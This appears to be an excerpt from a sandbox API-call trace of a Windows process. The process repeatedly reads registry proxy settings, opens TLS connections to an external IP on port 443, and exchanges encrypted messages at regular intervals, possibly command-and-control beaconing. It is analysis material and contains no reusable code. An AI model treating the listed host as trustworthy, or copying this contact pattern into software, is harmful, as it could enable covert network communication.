	[0276.543] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bbf970, MessageSeqNo=0x0 | out: pMessage=0x2ad23bbf970) returned 0x0
	[0276.543] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9e00
	[0276.543] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9e00*=((len=0x3b, buf=0x2ad23bbcc30*), (len=0xd5, buf=0x2ad23bbf778*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9e00*=((len=0x3b, buf=0x2ad23bbcc30*), (len=0xd5, buf=0x2ad23bbf778*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0276.544] CoTaskMemFree (pv=0x2ad3bac9e00) 
	[0276.544] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0276.544] recv (in: s=0x7d0, buf=0x2ad23bbfb18, len=5, flags=0 | out: buf=0x2ad23bbfb18*) returned 5
	[0277.033] recv (in: s=0x7d0, buf=0x2ad23bbfb3d, len=1488, flags=0 | out: buf=0x2ad23bbfb3d*) returned 1488
	[0277.033] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bc0220, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bc0220, pfQOP=0x0) returned 0x0
	[0277.033] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0277.033] SetEvent (hEvent=0x6b8) returned 1
	[0277.074] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0290.077] CloseHandle (hObject=0x388) returned 1
	[0290.376] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0290.377] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x398) returned 0x0
	[0290.377] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0290.377] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0290.378] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0290.378] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4
	[0290.378] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d4, fAsynchronous=1) returned 0x0
	[0290.379] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d8) returned 0x0
	[0290.379] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9dc
	[0290.379] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9dc, fAsynchronous=1) returned 0x0
	[0290.380] GetCurrentProcess () returned 0xffffffffffffffff
	[0290.380] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e0) returned 1
	[0290.380] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19ac0
	[0290.381] WinHttpSetTimeouts (hInternet=0x2ad3bb19ac0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0290.381] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0290.399] SetEvent (hEvent=0x6b8) returned 1
	[0290.400] select (in: nfds=0, readfds=0x2ad23bc7c18, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bc7c18, writefds=0x0, exceptfds=0x0) returned 1
	[0290.401] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0290.403] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0290.405] shutdown (s=0x7d0, how=2) returned 0
	[0290.407] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0290.407] closesocket (s=0x7d0) returned 0
	[0290.408] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0290.408] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9e8
	[0290.409] WSAConnect (in: s=0x7d0, name=0x2ad23bc93b0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0290.522] closesocket (s=0x9e8) returned 0
	[0290.523] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bc6358, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bc9c38, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bc9c38, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0290.525] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf7e0 | out: pvContextBuffer=0x2ad3badf7e0) returned 0x0
	[0290.525] send (in: s=0x7d0, buf=0x2ad23bc9d08*, len=333, flags=0 | out: buf=0x2ad23bc9d08*) returned 333
	[0290.525] recv (in: s=0x7d0, buf=0x2ad23bc9d08, len=5, flags=0 | out: buf=0x2ad23bc9d08*) returned 5
	[0290.631] recv (in: s=0x7d0, buf=0x2ad23bc9d0d, len=49, flags=0 | out: buf=0x2ad23bc9d0d*) returned 49
	[0290.631] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bc6358, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bc9f48, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bc9f68, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bc9f68, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0290.633] recv (in: s=0x7d0, buf=0x2ad23bca058, len=5, flags=0 | out: buf=0x2ad23bca058*) returned 5
	[0290.633] recv (in: s=0x7d0, buf=0x2ad23bca07d, len=1, flags=0 | out: buf=0x2ad23bca07d*) returned 1
	[0290.633] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bc6358, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bca150, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bca170, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bca170, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0290.634] recv (in: s=0x7d0, buf=0x2ad23bca260, len=5, flags=0 | out: buf=0x2ad23bca260*) returned 5
	[0290.634] recv (in: s=0x7d0, buf=0x2ad23bca285, len=48, flags=0 | out: buf=0x2ad23bca285*) returned 48
	[0290.635] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bc6358, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bca388, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23bca3a8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23bca3a8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0290.637] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3080 | out: pvContextBuffer=0x2ad3bad3080) returned 0x0
	[0290.637] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23bca4f0 | out: pBuffer=0x2ad23bca4f0) returned 0x0
	[0290.638] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23bca548 | out: pBuffer=0x2ad23bca548) returned 0x0
	[0290.638] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23bca5b0 | out: pBuffer=0x2ad23bca5b0) returned 0x0
	[0290.639] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06050) returned 0x2ad3bb06050
	[0290.639] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0290.640] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb06050
	[0290.640] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06050) returned 0x2ad3bb06050
	[0290.640] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb06050) returned 0x0
	[0290.640] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0290.640] CertFreeCertificateContext (pCertContext=0x2ad3bb06050) returned 1
	[0290.641] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0290.642] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb06050, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0290.643] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb06050, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0290.646] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0290.651] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06050) returned 0x2ad3bb06050
	[0290.653] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0290.655] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0290.655] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0290.655] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0290.655] SetLastError (dwErrCode=0x0) 
	[0290.656] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0290.656] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0290.657] CertFreeCertificateContext (pCertContext=0x2ad3bb06050) returned 1
	[0290.657] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bcd1b8, MessageSeqNo=0x0 | out: pMessage=0x2ad23bcd1b8) returned 0x0
	[0290.658] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9cb0
	[0290.658] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9cb0*=((len=0x3b, buf=0x2ad23bca478*), (len=0xd5, buf=0x2ad23bccfc0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9cb0*=((len=0x3b, buf=0x2ad23bca478*), (len=0xd5, buf=0x2ad23bccfc0*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0290.658] CoTaskMemFree (pv=0x2ad3bac9cb0) 
	[0290.658] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0290.658] recv (in: s=0x7d0, buf=0x2ad23bcd360, len=5, flags=0 | out: buf=0x2ad23bcd360*) returned 5
	[0291.149] recv (in: s=0x7d0, buf=0x2ad23bcd385, len=1488, flags=0 | out: buf=0x2ad23bcd385*) returned 1488
	[0291.149] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bcda68, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bcda68, pfQOP=0x0) returned 0x0
	[0291.150] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0291.151] SetEvent (hEvent=0x6b8) returned 1
	[0291.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0309.221] CloseHandle (hObject=0x388) returned 1
	[0309.535] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0309.535] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d0) returned 0x0
	[0309.536] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0309.536] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0309.537] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x25c) returned 0x0
	[0309.538] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0309.538] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0309.539] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x398) returned 0x0
	[0309.540] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0309.540] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0309.540] GetCurrentProcess () returned 0xffffffffffffffff
	[0309.540] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9cc) returned 1
	[0309.540] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb187a0
	[0309.541] WinHttpSetTimeouts (hInternet=0x2ad3bb187a0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0309.541] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0309.558] SetEvent (hEvent=0x6b8) returned 1
	[0309.559] select (in: nfds=0, readfds=0x2ad23bd5490, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23bd5490, writefds=0x0, exceptfds=0x0) returned 1
	[0309.560] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0309.562] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0309.564] shutdown (s=0x7d0, how=2) returned 0
	[0309.565] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0309.565] closesocket (s=0x7d0) returned 0
	[0309.566] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0309.567] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d8
	[0309.567] WSAConnect (in: s=0x7d0, name=0x2ad23bd6c28*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0309.678] closesocket (s=0x9d8) returned 0
	[0309.679] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23bd3bd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23bd74b0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23bd74b0, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0309.680] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfc30 | out: pvContextBuffer=0x2ad3badfc30) returned 0x0
	[0309.680] send (in: s=0x7d0, buf=0x2ad23bd7580*, len=333, flags=0 | out: buf=0x2ad23bd7580*) returned 333
	[0309.686] recv (in: s=0x7d0, buf=0x2ad23bd7580, len=5, flags=0 | out: buf=0x2ad23bd7580*) returned 5
	[0309.792] recv (in: s=0x7d0, buf=0x2ad23bd7585, len=49, flags=0 | out: buf=0x2ad23bd7585*) returned 49
	[0309.792] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23bd3bd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bd77c0, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bd77e0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23bd77e0, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0309.793] recv (in: s=0x7d0, buf=0x2ad23bd78d0, len=5, flags=0 | out: buf=0x2ad23bd78d0*) returned 5
	[0309.793] recv (in: s=0x7d0, buf=0x2ad23bd78f5, len=1, flags=0 | out: buf=0x2ad23bd78f5*) returned 1
	[0309.793] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23bd3bd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bd79c8, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bd79e8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23bd79e8, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0309.795] recv (in: s=0x7d0, buf=0x2ad23bd7ad8, len=5, flags=0 | out: buf=0x2ad23bd7ad8*) returned 5
	[0309.795] recv (in: s=0x7d0, buf=0x2ad23bd7afd, len=48, flags=0 | out: buf=0x2ad23bd7afd*) returned 48
	[0309.795] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23bd3bd0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23bd7c00, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23bd7c20, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23bd7c20, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0309.798] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3680 | out: pvContextBuffer=0x2ad3bad3680) returned 0x0
	[0309.798] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23bd7d68 | out: pBuffer=0x2ad23bd7d68) returned 0x0
	[0309.798] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23bd7dc0 | out: pBuffer=0x2ad23bd7dc0) returned 0x0
	[0309.799] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23bd7e28 | out: pBuffer=0x2ad23bd7e28) returned 0x0
	[0309.799] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04ed0) returned 0x2ad3bb04ed0
	[0309.800] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0309.800] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb04ed0
	[0309.800] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04ed0) returned 0x2ad3bb04ed0
	[0309.800] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb04ed0) returned 0x0
	[0309.800] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0309.801] CertFreeCertificateContext (pCertContext=0x2ad3bb04ed0) returned 1
	[0309.802] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0309.802] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb04ed0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0309.803] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb04ed0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0309.805] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0309.806] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04ed0) returned 0x2ad3bb04ed0
	[0309.807] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0309.808] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0309.808] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0309.808] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0309.808] SetLastError (dwErrCode=0x0) 
	[0309.808] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0309.809] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0309.809] CertFreeCertificateContext (pCertContext=0x2ad3bb04ed0) returned 1
	[0309.811] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23bdaa30, MessageSeqNo=0x0 | out: pMessage=0x2ad23bdaa30) returned 0x0
	[0309.811] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9e30
	[0309.811] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9e30*=((len=0x3b, buf=0x2ad23bd7cf0*), (len=0xd5, buf=0x2ad23bda838*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9e30*=((len=0x3b, buf=0x2ad23bd7cf0*), (len=0xd5, buf=0x2ad23bda838*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0309.812] CoTaskMemFree (pv=0x2ad3bac9e30) 
	[0309.812] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0309.812] recv (in: s=0x7d0, buf=0x2ad23bdabd8, len=5, flags=0 | out: buf=0x2ad23bdabd8*) returned 5
	[0310.307] recv (in: s=0x7d0, buf=0x2ad23bdabfd, len=1488, flags=0 | out: buf=0x2ad23bdabfd*) returned 1488
	[0310.307] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23bdb2e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23bdb2e0, pfQOP=0x0) returned 0x0
	[0310.308] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0310.308] SetEvent (hEvent=0x6b8) returned 1
	[0310.353] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0315.357] CloseHandle (hObject=0x388) returned 1
	[0315.519] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0315.520] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x9d0) returned 0x0
	[0315.520] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0315.520] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0315.520] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x25c) returned 0x0
	[0315.520] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0315.520] RegNotifyChangeKeyValue (hKey=0x25c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0315.521] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x398) returned 0x0
	[0315.521] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0315.521] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0315.521] GetCurrentProcess () returned 0xffffffffffffffff
	[0315.521] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9cc) returned 1
	[0315.521] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1abc0
	[0315.522] WinHttpSetTimeouts (hInternet=0x2ad3bb1abc0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0315.522] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0315.540] SetEvent (hEvent=0x6b8) returned 1
	[0315.540] select (in: nfds=0, readfds=0x2ad23be2cd8, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23be2cd8, writefds=0x0, exceptfds=0x0) returned 1
